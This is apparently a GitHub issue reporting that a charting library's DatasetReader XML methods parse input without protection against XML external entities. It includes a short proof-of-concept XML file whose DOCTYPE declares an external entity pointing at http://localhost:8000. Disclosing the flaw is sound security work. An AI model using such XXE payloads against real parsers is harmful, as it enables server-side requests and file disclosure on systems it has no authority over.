Skip to content

XML Parse Bug #130

@kingkaki

Description

@kingkaki

You have not set security Feature to cause XXE(XML external entity attack)
code

DatasetReader.readPieDatasetFromXML(new File("1.xml"));
DatasetReader.readCategoryDatasetFromXML(new File("1.xml"));

1.xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE sec [
        <!ENTITY xxe SYSTEM "http://localhost:8000" >]>
<CategoryDataset>&xxe;</CategoryDataset>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions